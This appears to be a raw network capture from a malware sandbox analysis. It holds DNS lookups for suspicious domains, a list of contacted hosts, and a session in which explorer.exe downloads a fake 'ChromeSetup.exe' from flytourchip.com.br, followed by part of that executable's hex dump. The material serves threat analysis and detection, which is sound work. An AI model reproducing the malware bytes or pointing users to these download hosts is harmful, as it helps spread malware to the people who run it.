                                                                                    Feb 7, 2023 19:45:01.912767887 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912781954 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912808895 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912844896 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912854910 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912883997 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912914991 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912931919 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912961006 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.912986040 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.912986040 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913007975 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913036108 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913052082 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913081884 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913113117 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913127899 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913157940 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913196087 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913204908 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913233042 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913266897 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913281918 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913311958 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913347006 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913360119 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913392067 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913423061 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913449049 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913476944 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913510084 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913523912 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913552046 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913583040 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913599968 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913630009 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913664103 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913676023 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913706064 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913742065 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913753986 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913781881 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913813114 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913829088 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913868904 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913906097 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913917065 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.913947105 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913980007 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.913995028 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914021969 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914052963 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914067984 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914094925 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914129972 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914145947 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914174080 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914210081 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914222002 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914251089 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914283037 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914298058 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914328098 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914361000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914375067 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914402962 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914437056 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914447069 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914475918 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914499998 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914527893 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914558887 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914580107 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914580107 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914597034 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914627075 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914652109 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914652109 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914674044 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914688110 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914688110 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914767027 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914798021 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914810896 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914843082 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914872885 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914885998 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914915085 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914947033 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.914961100 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.914988995 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915024996 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915034056 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915060997 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915091991 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915106058 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915134907 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915173054 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915184021 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915214062 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915249109 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915257931 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915287018 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915318966 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915333033 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915359974 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915396929 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915405035 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915435076 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915469885 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915479898 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915508986 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915539980 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915554047 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915582895 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915617943 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915627956 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915654898 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915688992 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915698051 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915726900 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915756941 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915787935 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915801048 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915827990 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915858030 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915858030 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915873051 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915904045 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915932894 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.915946007 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915967941 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.915987968 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.916017056 CET4969980192.168.2.3188.114.96.3
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Feb 7, 2023 19:44:46.530975103 CET192.168.2.38.8.8.80xd71eStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:01.171063900 CET192.168.2.38.8.8.80x5d0Standard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:03.833204985 CET192.168.2.38.8.8.80xf00fStandard query (0)flytourchip.com.brA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:04.918548107 CET192.168.2.38.8.8.80xee27Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:05.436633110 CET192.168.2.38.8.8.80x93abStandard query (0)potunulit.orgA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:34.826117039 CET192.168.2.38.8.8.80x29e1Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:41.806687117 CET192.168.2.38.8.8.80xfc92Standard query (0)xv.yxzgamen.comA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:47.377264977 CET192.168.2.38.8.8.80x36eeStandard query (0)iueg.aappatey.comA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:53.661890984 CET192.168.2.38.8.8.80x3dbbStandard query (0)xv.yxzgamen.comA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:54.348076105 CET192.168.2.38.8.8.80xe0b6Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:54.582577944 CET192.168.2.38.8.8.80x6340Standard query (0)siaoheg.aappatey.comA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.575400114 CET192.168.2.38.8.8.80xa3e2Standard query (0)perficut.atA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:56.694607973 CET192.168.2.38.8.8.80x2fbeStandard query (0)perficut.atA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.098745108 CET192.168.2.38.8.8.80xfe0fStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.370901108 CET192.168.2.38.8.8.80xe71aStandard query (0)perficut.atA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Feb 7, 2023 19:44:46.554482937 CET8.8.8.8192.168.2.30xd71eNo error (0)potunulit.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:44:46.554482937 CET8.8.8.8192.168.2.30xd71eNo error (0)potunulit.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:01.191075087 CET8.8.8.8192.168.2.30x5d0No error (0)potunulit.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:01.191075087 CET8.8.8.8192.168.2.30x5d0No error (0)potunulit.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:04.151479006 CET8.8.8.8192.168.2.30xf00fNo error (0)flytourchip.com.br158.69.96.67A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:04.941478014 CET8.8.8.8192.168.2.30xee27No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:05.458060026 CET8.8.8.8192.168.2.30x93abNo error (0)potunulit.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:05.458060026 CET8.8.8.8192.168.2.30x93abNo error (0)potunulit.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:34.843812943 CET8.8.8.8192.168.2.30x29e1No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:34.843812943 CET8.8.8.8192.168.2.30x29e1No error (0)star-mini.c10r.facebook.com157.240.253.35A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:41.829817057 CET8.8.8.8192.168.2.30xfc92No error (0)xv.yxzgamen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:41.829817057 CET8.8.8.8192.168.2.30xfc92No error (0)xv.yxzgamen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:47.396763086 CET8.8.8.8192.168.2.30x36eeNo error (0)iueg.aappatey.com45.66.159.142A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:53.683685064 CET8.8.8.8192.168.2.30x3dbbNo error (0)xv.yxzgamen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:53.683685064 CET8.8.8.8192.168.2.30x3dbbNo error (0)xv.yxzgamen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:54.369381905 CET8.8.8.8192.168.2.30xe0b6No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:54.603955984 CET8.8.8.8192.168.2.30x6340No error (0)siaoheg.aappatey.com45.66.159.142A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at189.156.154.174A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at189.143.172.107A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at190.219.54.242A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at138.36.3.134A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at222.236.49.123A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:55.803621054 CET8.8.8.8192.168.2.30xa3e2No error (0)perficut.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at190.219.54.242A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at138.36.3.134A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at222.236.49.123A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at189.156.154.174A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:57.166321993 CET8.8.8.8192.168.2.30x2fbeNo error (0)perficut.at189.143.172.107A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.118758917 CET8.8.8.8192.168.2.30xfe0fNo error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at37.34.248.24A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at189.156.154.174A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at189.143.172.107A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at190.219.54.242A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at190.117.75.91A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at138.36.3.134A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at222.236.49.123A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                    Feb 7, 2023 19:45:58.845731974 CET8.8.8.8192.168.2.30xe71aNo error (0)perficut.at195.158.3.162A (IP address)IN (0x0001)false
                                                                                    • flytourchip.com.br
                                                                                    • api.2ip.ua
                                                                                    • www.facebook.com
                                                                                    • xv.yxzgamen.com
                                                                                    • qmxjpgcre.net
                                                                                      • potunulit.org
                                                                                    • mxhagj.org
                                                                                    • idkcje.org
                                                                                    • dxwvikrtgo.org
                                                                                    • usbhmmnst.net
                                                                                    • nqnoakwgow.net
                                                                                    • scuexnvs.com
                                                                                    • tmafbpv.org
                                                                                    • 77.73.134.27
                                                                                    • fjgurrg.com
                                                                                    • yxysrc.org
                                                                                    • vrtsdpwuux.com
                                                                                    • saeqmrs.com
                                                                                    • auuuhpc.com
                                                                                    • tpniggi.com
                                                                                    • fxqslbplw.net
                                                                                    • fixgfsjkdd.org
                                                                                    • mhfgwrr.org
                                                                                    • 62.204.41.134
                                                                                    • iueg.aappatey.com
                                                                                    • siaoheg.aappatey.com
                                                                                    • esvui.net
                                                                                      • perficut.at
                                                                                    • xacanotyi.org
                                                                                    • coaqka.com
                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.349700158.69.96.67443C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:45:04 UTC0OUTGET /systems/ChromeSetup.exe HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: flytourchip.com.br
                                                                                    2023-02-07 18:45:04 UTC0INHTTP/1.1 200 OK
                                                                                    Date: Tue, 07 Feb 2023 18:45:04 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 07 Feb 2023 16:35:02 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 198656
                                                                                    Connection: close
                                                                                    Content-Type: application/x-msdownload
                                                                                    2023-02-07 18:45:04 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bb af 8b fc ff ce e5 af ff ce e5 af ff ce e5 af 42 81 73 af fe ce e5 af e1 9c 70 af e3 ce e5 af e1 9c 66 af 82 ce e5 af d8 08 9e af f8 ce e5 af ff ce e4 af 77 ce e5 af e1 9c 61 af d3 ce e5 af e1 9c 71 af fe ce e5 af e1 9c 74 af fe ce e5 af 52 69 63 68 ff ce e5 af 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 11 88 56 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 84 01
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BspfwaqtRichPELVb
                                                                                    2023-02-07 18:45:04 UTC8INData Raw: 00 00 00 5b 5d 00 00 21 3d 00 00 3d 3d 00 00 21 00 00 00 3c 3c 00 00 3e 3e 00 00 3d 00 00 00 20 64 65 6c 65 74 65 00 20 6e 65 77 00 00 00 00 5f 5f 75 6e 61 6c 69 67 6e 65 64 00 5f 5f 72 65 73 74 72 69 63 74 00 00 5f 5f 70 74 72 36 34 00 5f 5f 63 6c 72 63 61 6c 6c 00 00 00 5f 5f 66 61 73 74 63 61 6c 6c 00 00 5f 5f 74 68 69 73 63 61 6c 6c 00 00 5f 5f 73 74 64 63 61 6c 6c 00 00 00 5f 5f 70 61 73 63 61 6c 00 00 00 00 5f 5f 63 64 65 63 6c 00 5f 5f 62 61 73 65 64 28 00 00 00 00 b4 2b 40 00 ac 2b 40 00 a0 2b 40 00 94 2b 40 00 88 2b 40 00 7c 2b 40 00 70 2b 40 00 68 2b 40 00 5c 2b 40 00 50 2b 40 00 4d 2b 40 00 90 26 40 00 74 26 40 00 60 26 40 00 40 26 40 00 24 26 40 00 48 2b 40 00 40 2b 40 00 3c 2b 40 00 38 2b 40 00 34 2b 40 00 30 2b 40 00 2c 2b 40 00 28 2b 40 00
                                                                                    Data Ascii: []!===!<<>>= delete new__unaligned__restrict__ptr64__clrcall__fastcall__thiscall__stdcall__pascal__cdecl__based(+@+@+@+@+@|+@p+@h+@\+@P+@M+@&@t&@`&@@&@$&@H+@@+@<+@8+@4+@0+@,+@(+@
                                                                                    2023-02-07 18:45:04 UTC15INData Raw: b9 36 81 6c 24 3c d1 c9 b9 58 81 84 24 84 00 00 00 84 8e ef 53 81 44 24 0c b4 d1 21 2b 81 44 24 1c 6a 91 47 4a 81 6c 24 3c 47 ff 41 7e b8 fd 83 74 43 f7 64 24 74 8b 44 24 74 b8 6f ef 51 5a f7 64 24 20 8b 44 24 20 b8 14 49 76 17 f7 64 24 78 8b 44 24 78 b8 56 25 37 28 f7 64 24 2c 8b 44 24 2c 81 6c 24 40 96 2b 15 20 b8 d8 5d 19 2e f7 64 24 5c 8b 44 24 5c 81 6c 24 48 b7 fa ad 2e 81 6c 24 54 5c 30 08 56 81 44 24 20 2f 2c 18 47 b8 28 9b 14 19 f7 64 24 28 8b 44 24 28 56 ff 35 50 73 55 00 c6 05 b3 d6 42 00 65 c6 05 a9 d6 42 00 69 c6 05 ac d6 42 00 75 c6 05 ae d6 42 00 6c c6 05 ad d6 42 00 61 c6 05 b1 d6 42 00 6f c6 05 b5 d6 42 00 74 c6 05 a8 d6 42 00 56 c6 05 b4 d6 42 00 63 c6 05 af d6 42 00 50 c6 05 b6 d6 42 00 00 c6 05 ab d6 42 00 74 c6 05 b2 d6 42 00 74 c6 05
                                                                                    Data Ascii: 6l$<X$SD$!+D$jGJl$<GA~tCd$tD$toQZd$ D$ Ivd$xD$xV%7(d$,D$,l$@+ ].d$\D$\l$H.l$T\0VD$ /,G(d$(D$(V5PsUBeBiBuBlBaBoBtBVBcBPBBtBt
